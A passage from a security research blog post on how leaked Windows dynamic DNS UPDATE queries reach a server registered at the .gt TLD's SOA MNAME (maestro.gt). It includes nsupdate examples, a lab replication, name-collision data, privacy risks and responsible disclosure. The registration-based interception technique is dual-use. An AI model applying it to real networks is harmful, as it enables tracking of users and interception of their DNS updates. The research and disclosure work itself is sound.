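update add documentation.east.thehackerblog.com 300 A 10.1.2.3
send
EOF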

The process for this is a bit technical (I've summarized it below) and is as follows (quoted from “Understanding Dynamic Update”):

  • The DNS Client service sends a start of authority (SOA)–type query using the DNS domain name of the computer.
  • The client computer uses the currently configured FQDN of the computer (such as newhost.tailspintoys.com) as the name that is specified in this query.
    • For standard primary zones, the primary server (owner) that is returned in the SOA query response is fixed and static. It always matches the exact DNS name as it appears in the SOA resource record that is stored with the zone. If, however, the zone being updated is directory integrated, any DNS server that is loading the zone can respond and dynamically insert its own name as the primary server (owner) of the zone in the SOA query response.
  • The DNS Client service then attempts to contact the primary DNS server.
    • The client processes the SOA query response for its name to determine the IP address of the DNS server that is authorized as the primary server for accepting its name. It then proceeds to perform the following sequence of steps as needed to contact and dynamically update its primary server
      • It sends a dynamic update request to the primary server that is determined in the SOA query response.

        If the update succeeds, no further action is taken.

      • If this update fails, the client next sends a name server (NS)–type query for the zone name that is specified in the SOA record.
      • When it receives a response to this query, it sends an SOA query to the first DNS server that is listed in the response.
      • After the SOA query is resolved, the client sends a dynamic update to the server that is specified in the returned SOA record.

        If the update succeeds, no further action is taken.

      • If this update fails, the client repeats the SOA query process by sending to the next DNS server that is listed in the response.
  • After the primary server that can perform the update is contacted, the client sends the update request and the server processes it.

    The contents of the update request include instructions to add host (A) (and possibly pointer (PTR)) resource records for newhost.tailspintoys.com and to remove these same record types for oldhost.tailspintoys.com, the name that was registered previously.

    The server also checks to ensure that updates are permitted for the client request. For standard primary zones, dynamic updates are not secured; therefore, any client attempt to update succeeds. For AD DS-integrated zones, updates are secured and performed using directory-based security settings.

The above process is long-winded and can be a lot to consume at first so I’ve bolded the important sections. Summing this up the client does the following:

  • A SOA query with the full hostname of the current machine is sent to the network DNS server by the host. In our previous example this would be a query containing documentation.east.thehackerblog.com as a hostname.
  • The network’s DNS server receives this request and replies with a SOA record of its own which specifies what the hostname of the master nameserver is. This may be something like ns1.thehackerblog.com, for example.
  • The client then parses this SOA record and reaches out to the ns1.thehackerblog.com server specified in the SOA MNAME field of the reply with the DNS update/change it would like to make.
  • The ns1.thehackerblog.com DNS server receives this update and changes its records to match accordingly. The DNS record for documentation.east.thehackerblog.com now points to the host’s new IP address and everything routes properly again!

Windows Domain Naming Conventions & Best Practice Guidelines

The final piece of information we need to absorb before we understand our Guatemalan DNS anomaly is the following requirement for Windows domains:

“By default, the DNS client does not attempt dynamic update of top-level domain (TLD) zones. Any zone that is named with a single-label name is considered to be a TLD zone, for example, com, edu, blank, my-company. To configure a DNS client to allow the dynamic update of TLD zones, you can use the Update Top Level Domain Zones policy setting or you can modify the registry.”

So by default you can't have a Windows domain of companydomain, for example, because it's single-label and is considered by Windows to be a top level domain (TLD) like .com, .net, or .gt. While this default can be overridden on each individual DNS client (read: every computer in your network), it's much easier just to use a domain like companydomain.com. While not all companies follow this direction, it is highly recommended because having a single-label domain could potentially cause many conflicts down the line if your internal network domain ends up being registered as a top-level domain in the Internet's DNS root zone (an issue known as Name Collision which was, and continues to be, a hotly debated topic).

Putting it All Together – Becoming Master of Your Domain!

Now that we have all of this information, the situation becomes quite a bit clearer. The country of Guatemala likely has many Windows networks which have internal Windows domains that are sub-domains of the .gt TLD. For example, if Microsoft had an office in Guatemala their internal network domain might be something like microsoftinternal.com.gt. These machines periodically make dynamic DNS updates to their network's DNS server to ensure that all of the network's hostnames are up-to-date and routing properly. For a variety of reasons, such as prevention of name collisions with external company Internet sub-domains, it's also likely that many networks use internal network domains which don't exist on the wider Internet. In this case Microsoft might use an internal Active Directory domain name such as microsoftinternal.com.gt since hosts under this domain wouldn't ever have naming conflicts with external Internet sub-domains of microsoft.com.gt.

The issue is that many subtle DNS misconfigurations can cause DNS requests which should go to the internal domain's DNS server to hit the top level domain's (TLD) servers instead. This issue is known as name collision and is a well-documented problem, sometimes referred to as DNS queries "leaking". If a machine uses a DNS resolver which is not aware of the internal network's DNS setup, or is misconfigured to pass these queries on to the Internet's DNS servers, then these queries are leaked to the .gt TLD servers since they are the delegated nameservers for that entire TLD space. The problem of name collisions is incredibly common and is the same reason why new TLDs are often subjected to a large amount of scrutiny to make sure that they aren't a common internal network domain name such as .local, .localhost, .localdomain, etc.

When this leaking occurs for an internal domain that is part of the .gt extension, the DNS UPDATE query sent by a machine attempting to update an internal DNS record is accidentally sent to the .gt TLD servers. Say, for example, we are a host on the microsoftinternal.com.gt internal domain and we send our DNS UPDATE query to a com.gt TLD server. The following is an example of this query performed with the nsupdate DNS command line tool (available on most OS X and Linux systems):

mandatory ~/P/gtmaster> nsupdate -d
> prereq nxdomain printer.microsoftinternal.com.gt
> update add printer.microsoftinternal.com.gt 800 A 172.16.3.131
> send
Reply from SOA query:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id:  25175
;; flags: qr rd ra; QUESTION: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;printer.microsoftinternal.com.gt. IN    SOA

;; AUTHORITY SECTION:
com.gt.            0    IN    SOA    maestro.gt. alejandra.reynoso.cctld.gt. 2017012812 3600 600 604800 14400

Found zone name: com.gt
The master is: maestro.gt
Sending update to 52.15.155.128#53
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id:  62645
;; flags:; ZONE: 1, PREREQ: 1, UPDATE: 1, ADDITIONAL: 0
;; PREREQUISITE SECTION:
printer.microsoftinternal.com.gt. 0 NONE ANY    

;; UPDATE SECTION:
printer.microsoftinternal.com.gt. 800 IN A    172.16.3.131


Reply from update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOTAUTH, id:  62645
;; flags: qr; ZONE: 1, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;com.gt.                IN    SOA

> 

We can see that the query resulted in an NXDOMAIN error, but regardless an SOA response is returned with maestro.gt as the master nameserver. Since this is exactly what the host was looking for (i.e. it's a valid SOA response to this query), it parses out the maestro.gt MNAME and proceeds to send the DNS update query to the server behind maestro.gt hosted at 52.15.155.128 (my server). This query ends in failure because I've set up my DNS server to reject all update requests from clients (since I don't want to actively interfere with these machines/networks). This is why all of these random machines are sending DNS update requests to my maestro.gt server.

What we have is essentially a new DNS issue which is the result of name collisions leading to dynamic DNS updates being sent to whatever server is listed under a TLD's SOA record. Unlike regular name collisions though, we don't need to register an entirely new TLD to exploit this issue; we just need to register the domain name listed under an existing TLD's SOA record (as we did with maestro.gt).

Try It Yourself – A Quick Lab

Note: Feel free to skip this section if you’re not interested in replicating these results personally.

If you’d like to see this behavior in action it’s actually fairly simple to replicate. We’ll use Windows 7 as our example OS inside of VMware along with Wireshark running to follow all the DNS traffic being sent by our machine.

To change your computer’s DNS suffix to match what a Guatemalan active directory domain might look like, go to Start > Computer > System Properties > Change Settings > Change > More and set the primary DNS suffix to any domain under the .gt TLD:

[Screenshot: setting the primary DNS suffix in the Windows system properties dialog]

Click OK and apply this new setting; you will be prompted to restart your computer. Go ahead and do so and keep Wireshark running while Windows is starting up. You should see that during the startup process a few Dynamic Update queries are issued:

[Screenshot: Wireshark capture of the example DNS update request chain]

The above screenshot of my Wireshark output shows that the Windows VM did the following upon startup:

  • Attempts to query the 8.8.8.8 DNS resolver for the SOA of mandatory.dnsleaktestnetwork.com.gt (resulting in an NXDOMAIN error because that record doesn't exist on the public Internet, which is what 8.8.8.8 queries).
  • Windows then parses this NXDOMAIN response and finds a valid SOA MNAME record of maestro.gt in the response sent from the TLD.
  • Windows then reaches out to maestro.gt (my server) and attempts to do a DNS UPDATE request. This fails because my server is configured to refuse all of these requests.
  • Windows then attempts the entire process over again, this time in all capital letters instead (???).

We've now seen in action exactly what goes on with these Windows machines that are hitting the maestro.gt server.
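
Whether in this lab capture or in the pcap from my server, you can pull out just the dynamic update traffic by filtering on the DNS opcode for UPDATE (5); a minimal tshark sketch (the capture file name matches the earlier sketch, and the field name is as exposed by recent Wireshark builds):

# Show only DNS UPDATE messages (opcode 5) from the capture file.
tshark -r dns-traffic.pcap -Y 'dns.flags.opcode == 5'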

So, Just How Common Is This Issue?

Since Guatemala, and by extension the .gt domain space, is relatively small in comparison to the bigger top level domains such as .com, .net, .org, .us, etc., we can only see a small fraction of the global number of DNS requests made due to this issue. On a larger scale, it's likely that a huge amount of traffic is generated towards many of the more popular TLD nameservers from networks which utilize those TLDs in their AD domains.

Luckily, while I haven't been able to find any previous exploit research on Dynamic Update SOA hijacking specifically, we do have a great deal of past research on name collisions in general. This is largely because of worries about newly issued TLDs conflicting with internal network domains which are utilized by computers/networks across the world. For a good overview of this problem and research into how widespread it is I recommend reading Name Collision in the DNS, a report commissioned by ICANN to better understand the name collision problem and its effects on the wider Internet. This report contains lots of real-world data on just how big the name collision problem is and gives us a good base to extrapolate how widespread this specific SOA Dynamic Update variant is in the wild.

Perhaps the most damning piece of real world data that was collected and presented in this report is the following table:

[Table: TLDs ranked by number of DNS requests to the root servers (in thousands), from the ICANN report]

The above table is a ranked list of requested TLDs ordered by the number of DNS requests to the roots (in thousands). The original report lists the top 100 TLDs, but the image above truncates it to just 20. This table sheds some light on the raw number of leaked DNS requests actually hitting the roots that were never meant to end up there at all. As can be seen, requests for the invalid TLD of .local account for more requests to the DNS roots than all .org and .arpa requests combined, ranking as the 3rd most requested TLD overall! The following pie chart also sheds further light onto the scale of the problem:

[Pie chart: breakdown of requests to the root servers by TLD, from the ICANN report]

The above chart shows that a shocking 45% of requests to the root servers are for TLDs which do not exist and are likely the result of leaked DNS requests. Perhaps even more shocking is that the number is likely even higher due to the possibility of internal domains having a valid top level domain but an invalid second level domain, such as the previously mentioned microsoftinternal.com.gt. These requests would appear valid to the roots (since .gt is a valid record in the root zone) but would be revealed as leaked/invalid once they hit the com.gt TLD servers.

What's also very interesting is that the report mentions observing traffic stemming from this problem but does not appear to have investigated it much:

5.4.5 Name includes _ldap or _kerberos at the lowest level

Patterns observed show many requests of one of the forms:

  • _ldap._tcp.dc._msdcs.
  • _ldap._tcp.pdc._msdcs.
  • _ldap._tcp.._sites.dc._msdcs.
  • _ldap._tcp.._sites.gc._msdcs.
  • _ldap._tcp.._sites.
  • _ldap._tcp.
  • _kerberos._tcp.dc._msdcs.
  • _kerberos._tcp.._sites.dc._msdcs.
  • _kerberos._tcp.._sites.
  • _kerberos._tcp.

Typically these are queries for SRV records, although sometimes they are requests for SOA records. They appear to be related to Microsoft Active Directory services.

Look familiar? The above remark about SOA records almost certainly describes traffic generated by this exact same issue. It is mentioned again later in the report as well:

Although the overwhelming majority of the observed DNS traffic in this study has been name lookups (i.e., conventional queries), some other DNS requests have been detected. These are mostly Dynamic Updates—traffic that should never reach the root servers. After all, changes to the DNS root are not carried out using Dynamic Updates, let alone ones originating from random IP addresses on the Internet. The most likely explanation for this behavior would be misconfigured Active Directory installations that leak from an internal network to the public Internet. It should be noted however that this study did not examine the root cause of this traffic.

The statement eventually concludes with:

It is not known what impact, if any, this might have on the end client or how this could change its subsequent behavior. Currently, no significant harm appears to result when these Dynamic Update requests receive a REFUSED or NOTAUTH error response. Returning a referral response after example is delegated at the root might cause these clients to fail or behave unexpectedly. It seems likely that this would create end user confusion and support problems for the organization’s IT department.

Sadly this report doesn't make any statements about the actual volume of this traffic, so we're unable to get a good idea of the percentage/total scale of this issue in comparison to other name collisions. The report also fails to note that the security considerations are actually much larger in scope due to the fact that the SOA MNAME returned by a TLD could potentially be a completely arbitrary domain (as was the case with .gt and maestro.gt). This potentially allows any attacker to get in the middle of these DNS transactions via a simple domain registration, just as we exploited for .gt.

Given this admittedly limited information, I don't think it's a big reach to assume that this issue is actively occurring at scale and that many of the top level domain servers must see a non-trivial amount of traffic from this problem. Depending on the specific configuration of each TLD's SOA record, they may also be vulnerable to exploitation if their SOA MNAME is available for registration, as was the case here.

Fixing the Problem & Wider TLD Security Considerations

Given that the barrier to entry for exploiting this problem is so low (essentially just buying a domain name), and the impact seems to be of concern for a number of reasons, I don't feel it would be unreasonable to require TLDs to ensure that the SOA MNAME field of their responses is either non-resolvable or resolves to a TLD-controlled server which refuses to process these dynamic update queries. Given that this mistake appears to be easy to make, due to the SOA MNAME field not really being used for DNS slave replication much anymore, I don't feel this change would be too unreasonable. Sadly, if you review the results of the generated TLD Health Report mentioned earlier in this post you'll see that a shocking number of TLDs are actually very broken in the functional sense. Given this fact, the hope for enforcement of this security concern is low, since even simple things like "having all of the TLD's nameservers in a working state" are not currently universally true. If we can't even ensure that TLDs are healthy in general, how can we ever hope to ensure that all TLDs are mitigating this issue?

Calling on network administrators to prevent issues of this type in their own networks does not appear to be a winnable war either given the scale of DNS name collisions. While it’s important to notify and ensure that network admins understand this risk, ensuring that 100% of networks always configure things properly is a bit of a pipe dream.

A Privacy Nightmare

Given the fact that these machines in Guatemala appear to call out on a pretty regular basis, there are some fairly big privacy concerns with this issue. Many of the DNS requests had hostnames which were very personal in nature (think NANCY-PC, MYLAPTOP, etc). Since a DNS UPDATE query is sent due to a variety of triggers, this means a user's personal computer would be phoning home to my nameserver every time they travelled, changed networks, or rebooted their machine. This would make it easy to monitor someone as they take their laptop from work, to home, to the local cafe, and so on. The internal IP addresses add to the privacy risk as well, given that they help map out the remote network's IP scheme. All the while these people have no idea that their computer is silently reporting their location. Imagine something like the following being built based off of this data:

[Map: illustrative example of tracking a device's check-ins over time]

Note: The above map doesn't reflect any real data and is purely for illustrative purposes.

Needless to say, the privacy concerns might raise a few eyebrows.

Ethical Handling of Research Data

Out of respect for the privacy of the people of Guatemala, the raw update query data collected from this research will never be published and has been securely deleted. Additionally, all further traffic from these computers will be routed to 127.0.53.53 to ensure that no further UPDATE queries will be sent for the rest of my maestro.gt domain registration term (of about two years). The IP address 127.0.53.53 is special because it was specifically commissioned by ICANN to warn network administrators of name collision issues. The hope is that if a network admin or tech-savvy user in Guatemala sees DNS traffic being routed to this IP they will Google it and immediately find that their network/AD setup is vulnerable to this issue.
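
In the catch-all zone this is just a matter of changing what the records answer with (a sketch of the relevant records, assuming the hypothetical zone file shown earlier):

; Every name now resolves to ICANN's name collision notification address
; instead of my server's IP:
maestro  IN A   127.0.53.53
*        IN A   127.0.53.53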

Additionally I’ve emailed the DNS admin of the .gt TLD informing her of this issue and asked that she change the MNAME to something no-longer resolvable. Since nobody else can abuse this, combined with the fact that I’m sinkholing all DNS traffic to 127.0.53.53, combined further with the fact that my domain registration term is two years – I’ve decided to publish this post despite the MNAME still being maestro.gt as of this time_._ I imagine that two years of time for a patch falls within reason for patch expectations :).

Overall this was a fun experiment and highlights some very interesting ramifications of even minor TLD misconfigurations such as this one.

Until next time,

-mandatory